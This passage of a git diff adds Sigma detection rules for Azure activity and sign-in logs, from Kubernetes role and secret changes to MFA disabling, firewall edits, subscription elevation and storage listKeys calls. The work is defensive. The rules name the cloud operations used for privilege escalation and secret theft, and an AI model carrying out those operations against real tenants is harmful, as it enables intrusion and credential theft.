deletion of Azure Kubernetes Pods. +author: Austin Songer @austinsonger +status: experimental +date: 2021/07/24 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml +logsource: + product: azure + service: activitylogs +detection: + selection_operation_name: + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE + condition: selection_operation_name +level: medium +tags: + - attack.impact +falsepositives: +- Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. +- Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_kubernetes_role_access.yml b/bin/main/rules/azure/azure_kubernetes_role_access.yml new file mode 100644 index 000000000..a3c9bf010 --- /dev/null +++ b/bin/main/rules/azure/azure_kubernetes_role_access.yml @@ -0,0 +1,33 @@ +title: Azure Kubernetes Sensitive Role Access +id: 818fee0c-e0ec-4e45-824e-83e4817b0887 +description: Identifies when ClusterRoles/Roles are being modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/BIND/ACTION + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/ESCALATE/ACTION + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/BIND/ACTION + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/ESCALATE/ACTION + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml b/bin/main/rules/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml new file mode 100644 index 000000000..efea094a1 --- /dev/null +++ b/bin/main/rules/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml @@ -0,0 +1,30 @@ +title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted +id: 25cb259b-bbdc-4b87-98b7-90d7c72f8743 +description: Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/DELETE + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access +falsepositives: + - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_kubernetes_secret_or_config_object_access.yml b/bin/main/rules/azure/azure_kubernetes_secret_or_config_object_access.yml new file mode 100644 index 000000000..f809df396 --- /dev/null +++ b/bin/main/rules/azure/azure_kubernetes_secret_or_config_object_access.yml @@ -0,0 +1,28 @@ +title: Azure Kubernetes Secret or Config Object Access +id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c +description: Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_kubernetes_service_account_modified_or_deleted.yml b/bin/main/rules/azure/azure_kubernetes_service_account_modified_or_deleted.yml new file mode 100644 index 000000000..355e7bd31 --- /dev/null +++ b/bin/main/rules/azure/azure_kubernetes_service_account_modified_or_deleted.yml @@ -0,0 +1,28 @@ +title: Azure Kubernetes Service Account Modified or Deleted +id: 12d027c3-b48c-4d9d-8bb6-a732200034b2 +description: Identifies when a service account is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_login_to_disabled_account.yml b/bin/main/rules/azure/azure_login_to_disabled_account.yml new file mode 100644 index 000000000..41c45d939 --- /dev/null +++ b/bin/main/rules/azure/azure_login_to_disabled_account.yml @@ -0,0 +1,22 @@ +title: Login to Disabled Account +id: 908655e0-25cf-4ae1-b775-1c8ce9cf43d8 +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Detect failed attempts to sign in to disabled accounts. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 50057 + ResultDescription: 'User account is disabled. The account has been disabled by an administrator.' + condition: selection +level: medium +falsepositives: + - Unknown +tags: + - attack.initial_access + - attack.t1078 diff --git a/bin/main/rules/azure/azure_mfa_denies.yml b/bin/main/rules/azure/azure_mfa_denies.yml new file mode 100644 index 000000000..f0f63b75e --- /dev/null +++ b/bin/main/rules/azure/azure_mfa_denies.yml @@ -0,0 +1,22 @@ +title: Multifactor Authentication Denied +id: e40f4962-b02b-4192-9bfe-245f7ece1f99 +status: experimental +author: AlertIQ +date: 2022/03/24 +description: User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account. +references: + - https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ +logsource: + product: azure + service: signinlogs +detection: + selection: + AuthenticationRequirement: 'multiFactorAuthentication' + Status|contains: 'MFA Denied' + condition: selection +level: medium +falsepositives: + - Users actually login but miss-click into the Deny button when MFA prompt. +tags: + - attack.initial_access + - attack.t1078.004 diff --git a/bin/main/rules/azure/azure_mfa_disabled.yml b/bin/main/rules/azure/azure_mfa_disabled.yml new file mode 100644 index 000000000..d8ce54bce --- /dev/null +++ b/bin/main/rules/azure/azure_mfa_disabled.yml @@ -0,0 +1,24 @@ +title: Disabled MFA to Bypass Authentication Mechanisms +id: 7ea78478-a4f9-42a6-9dcd-f861816122bf +status: experimental +description: Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms. +author: '@ionsor' +date: 2022/02/08 +references: + - https://attack.mitre.org/techniques/T1556/ + - https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates +logsource: + product: azure + service: activitylogs +detection: + selection: + eventSource: AzureActiveDirectory + eventName: 'Disable Strong Authentication.' + status: success + condition: selection +falsepositives: + - Authorized modification by administrators +level: medium +tags: + - attack.persistence + - attack.t1556 diff --git a/bin/main/rules/azure/azure_mfa_interrupted.yml b/bin/main/rules/azure/azure_mfa_interrupted.yml new file mode 100644 index 000000000..5919ea0fe --- /dev/null +++ b/bin/main/rules/azure/azure_mfa_interrupted.yml @@ -0,0 +1,25 @@ +title: Multifactor Authentication Interupted +id: 5496ff55-42ec-4369-81cb-00f417029e25 +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 50074 + ResultDescription|contains: 'Strong Auth required' + selection1: + ResultType: 500121 + ResultDescription|contains: 'Authentication failed during strong authentication request' + condition: selection or selection1 +level: medium +falsepositives: + - Unknown +tags: + - attack.initial_access + - attack.t1078.004 diff --git a/bin/main/rules/azure/azure_network_firewall_policy_modified_or_deleted.yml b/bin/main/rules/azure/azure_network_firewall_policy_modified_or_deleted.yml new file mode 100644 index 000000000..a679d1892 --- /dev/null +++ b/bin/main/rules/azure/azure_network_firewall_policy_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Azure Network Firewall Policy Modified or Deleted +id: 83c17918-746e-4bd9-920b-8e098bf88c23 +description: Identifies when a Firewall Policy is Modified or Deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/02 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/FIREWALLPOLICIES/WRITE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/JOIN/ACTION + - MICROSOFT.NETWORK/FIREWALLPOLICIES/CERTIFICATES/ACTION + - MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_network_firewall_rule_modified_or_deleted.yml b/bin/main/rules/azure/azure_network_firewall_rule_modified_or_deleted.yml new file mode 100644 index 000000000..42ef6878a --- /dev/null +++ b/bin/main/rules/azure/azure_network_firewall_rule_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Azure Firewall Rule Configuration Modified or Deleted +id: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067 +description: Identifies when a Firewall Rule Configuration is Modified or Deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_network_p2s_vpn_modified_or_deleted.yml b/bin/main/rules/azure/azure_network_p2s_vpn_modified_or_deleted.yml new file mode 100644 index 000000000..16373fbd0 --- /dev/null +++ b/bin/main/rules/azure/azure_network_p2s_vpn_modified_or_deleted.yml @@ -0,0 +1,27 @@ +title: Azure Point-to-site VPN Modified or Deleted +id: d9557b75-267b-4b43-922f-a775e2d1f792 +description: Identifies when a Point-to-site VPN is Modified or Deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/RESET/ACTION + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/GENERATEVPNPROFILE/ACTION + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DISCONNECTP2SVPNCONNECTIONS/ACTION + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_network_security_modified_or_deleted.yml b/bin/main/rules/azure/azure_network_security_modified_or_deleted.yml new file mode 100644 index 000000000..395880e92 --- /dev/null +++ b/bin/main/rules/azure/azure_network_security_modified_or_deleted.yml @@ -0,0 +1,27 @@ +title: Azure Network Security Configuration Modified or Deleted +id: d22b4df4-5a67-4859-a578-8c9a0b5af9df +description: Identifies when a network security configuration is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/DELETE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/JOIN/ACTION + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_network_virtual_device_modified_or_deleted.yml b/bin/main/rules/azure/azure_network_virtual_device_modified_or_deleted.yml new file mode 100644 index 000000000..7e8ed5b4a --- /dev/null +++ b/bin/main/rules/azure/azure_network_virtual_device_modified_or_deleted.yml @@ -0,0 +1,32 @@ +title: Azure Virtual Network Device Modified or Deleted +id: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3 +description: Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE + - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE + - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE + - MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION + - MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE + - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/DELETE + - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/WRITE + - MICROSOFT.NETWORK/VIRTUALHUBS/DELETE + - MICROSOFT.NETWORK/VIRTUALHUBS/WRITE + - MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE + - MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_new_cloudshell_created.yml b/bin/main/rules/azure/azure_new_cloudshell_created.yml new file mode 100644 index 000000000..e06b47f2f --- /dev/null +++ b/bin/main/rules/azure/azure_new_cloudshell_created.yml @@ -0,0 +1,21 @@ +title: Azure New CloudShell Created +id: 72af37e2-ec32-47dc-992b-bc288a2708cb +description: Identifies when a new cloudshell is created inside of Azure portal. +author: Austin Songer +status: experimental +date: 2021/09/21 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: MICROSOFT.PORTAL/CONSOLES/WRITE + condition: selection +level: medium +tags: + - attack.execution + - attack.t1059 +falsepositives: + - A new cloudshell may be created by a system administrator. diff --git a/bin/main/rules/azure/azure_owner_removed_from_application_or_service_principal.yml b/bin/main/rules/azure/azure_owner_removed_from_application_or_service_principal.yml new file mode 100644 index 000000000..d32b447cf --- /dev/null +++ b/bin/main/rules/azure/azure_owner_removed_from_application_or_service_principal.yml @@ -0,0 +1,24 @@ +title: Azure Owner Removed From Application or Service Principal +id: 636e30d5-3736-42ea-96b1-e6e2f8429fd6 +description: Identifies when a owner is was removed from a application or service principal in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - Remove owner from service principal + - Remove owner from application + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Owner being removed may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_rare_operations.yml b/bin/main/rules/azure/azure_rare_operations.yml new file mode 100644 index 000000000..169ae1b53 --- /dev/null +++ b/bin/main/rules/azure/azure_rare_operations.yml @@ -0,0 +1,27 @@ +title: Rare Subscription-level Operations In Azure +id: c1182e02-49a3-481c-b3de-0fadc4091488 +status: test +description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. +author: sawwinnnaung +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/azureactivity/RareOperations.yaml +date: 2020/05/07 +modified: 2021/11/27 +logsource: + product: azure + service: azureactivity +detection: + keywords: + - Microsoft.DocumentDB/databaseAccounts/listKeys/action + - Microsoft.Maps/accounts/listKeys/action + - Microsoft.Media/mediaservices/listKeys/action + - Microsoft.CognitiveServices/accounts/listKeys/action + - Microsoft.Storage/storageAccounts/listKeys/action + - Microsoft.Compute/snapshots/write + - Microsoft.Network/networkSecurityGroups/write + condition: keywords +falsepositives: + - Valid change +level: medium +tags: + - attack.t1003 diff --git a/bin/main/rules/azure/azure_service_principal_created.yml b/bin/main/rules/azure/azure_service_principal_created.yml new file mode 100644 index 000000000..46a14b711 --- /dev/null +++ b/bin/main/rules/azure/azure_service_principal_created.yml @@ -0,0 +1,22 @@ +title: Azure Service Principal Created +id: 0ddcff6d-d262-40b0-804b-80eb592de8e3 +description: Identifies when a service principal is created in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/02 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: 'Add service principal' + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Service principal being created may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_service_principal_removed.yml b/bin/main/rules/azure/azure_service_principal_removed.yml new file mode 100644 index 000000000..43328012b --- /dev/null +++ b/bin/main/rules/azure/azure_service_principal_removed.yml @@ -0,0 +1,22 @@ +title: Azure Service Principal Removed +id: 448fd1ea-2116-4c62-9cde-a92d120e0f08 +description: Identifies when a service principal was removed in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: Remove service principal + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Service principal being removed may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_subscription_permissions_elevation_via_activitylogs.yml b/bin/main/rules/azure/azure_subscription_permissions_elevation_via_activitylogs.yml new file mode 100644 index 000000000..37c184fd9 --- /dev/null +++ b/bin/main/rules/azure/azure_subscription_permissions_elevation_via_activitylogs.yml @@ -0,0 +1,21 @@ +title: Azure Subscription Permission Elevation Via ActivityLogs +id: 09438caa-07b1-4870-8405-1dbafe3dad95 +status: experimental +author: Austin Songer @austinsonger +date: 2021/11/26 +description: Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization +logsource: + product: azure + service: activitylogs +detection: + selection1: + properties.message: MICROSOFT.AUTHORIZATION/ELEVATEACCESS/ACTION + condition: selection1 +level: high +falsepositives: + - If this was approved by System Administrator. +tags: + - attack.initial_access + - attack.t1078 diff --git a/bin/main/rules/azure/azure_subscription_permissions_elevation_via_auditlogs.yml b/bin/main/rules/azure/azure_subscription_permissions_elevation_via_auditlogs.yml new file mode 100644 index 000000000..a566a107b --- /dev/null +++ b/bin/main/rules/azure/azure_subscription_permissions_elevation_via_auditlogs.yml @@ -0,0 +1,22 @@ +title: Azure Subscription Permission Elevation Via AuditLogs +id: ca9bf243-465e-494a-9e54-bf9fc239057d +status: experimental +author: Austin Songer @austinsonger +date: 2021/11/26 +description: Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: 'Administrative' + OperationName: 'Assigns the caller to user access admin' + condition: selection +level: high +falsepositives: + - If this was approved by System Administrator. +tags: + - attack.initial_access + - attack.t1078 diff --git a/bin/main/rules/azure/azure_suppression_rule_created.yml b/bin/main/rules/azure/azure_suppression_rule_created.yml new file mode 100644 index 000000000..7c079c960 --- /dev/null +++ b/bin/main/rules/azure/azure_suppression_rule_created.yml @@ -0,0 +1,22 @@ +title: Azure Suppression Rule Created +id: 92cc3e5d-eb57-419d-8c16-5c63f325a401 +description: Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Suppression Rule being created may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_unusual_authentication_interruption.yml b/bin/main/rules/azure/azure_unusual_authentication_interruption.yml new file mode 100644 index 000000000..18691dfd3 --- /dev/null +++ b/bin/main/rules/azure/azure_unusual_authentication_interruption.yml @@ -0,0 +1,28 @@ +title: Azure Unusual Authentication Interruption +id: 8366030e-7216-476b-9927-271d79f13cf3 +status: experimental +author: Austin Songer @austinsonger +date: 2021/11/26 +description: Detects when there is a interruption in the authentication process. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection1: + ResultType: 50097 + ResultDescription: 'Device authentication is required' + selection2: + ResultType: 50155 + ResultDescription: 'DeviceAuthenticationFailed' + selection3: + ResultType: 50158 + ResultDescription: 'ExternalSecurityChallenge - External security challenge was not satisfied' + condition: selection1 or selection2 or selection3 +level: medium +falsepositives: + - Unknown +tags: + - attack.initial_access + - attack.t1078 diff --git a/bin/main/rules/azure/azure_user_login_blocked_by_conditional_access.yml b/bin/main/rules/azure/azure_user_login_blocked_by_conditional_access.yml new file mode 100644 index 000000000..5c087a6ee --- /dev/null +++ b/bin/main/rules/azure/azure_user_login_blocked_by_conditional_access.yml @@ -0,0 +1,21 @@ +title: User Access Blocked by Azure Conditional Access +id: 9a60e676-26ac-44c3-814b-0c2a8b977adf +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Detect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 53003 + condition: selection +level: medium +falsepositives: + - Unknown +tags: + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/azure/azure_virtual_network_modified_or_deleted.yml b/bin/main/rules/azure/azure_virtual_network_modified_or_deleted.yml new file mode 100644 index 000000000..6b25808c8 --- /dev/null +++ b/bin/main/rules/azure/azure_virtual_network_modified_or_deleted.yml @@ -0,0 +1,26 @@ +title: Azure Virtual Network Modified or Deleted +id: bcfcc962-0e4a-4fd9-84bb-a833e672df3f +description: Identifies when a Virtual Network is modified or deleted in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message|startswith: + - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/ + - MICROSOFT.NETWORK/VIRTUALNETWORKS/ + properties.message|endswith: + - /WRITE + - /DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_vpn_connection_modified_or_deleted.yml b/bin/main/rules/azure/azure_vpn_connection_modified_or_deleted.yml new file mode 100644 index 000000000..58d96b14e --- /dev/null +++ b/bin/main/rules/azure/azure_vpn_connection_modified_or_deleted.yml @@ -0,0 +1,23 @@ 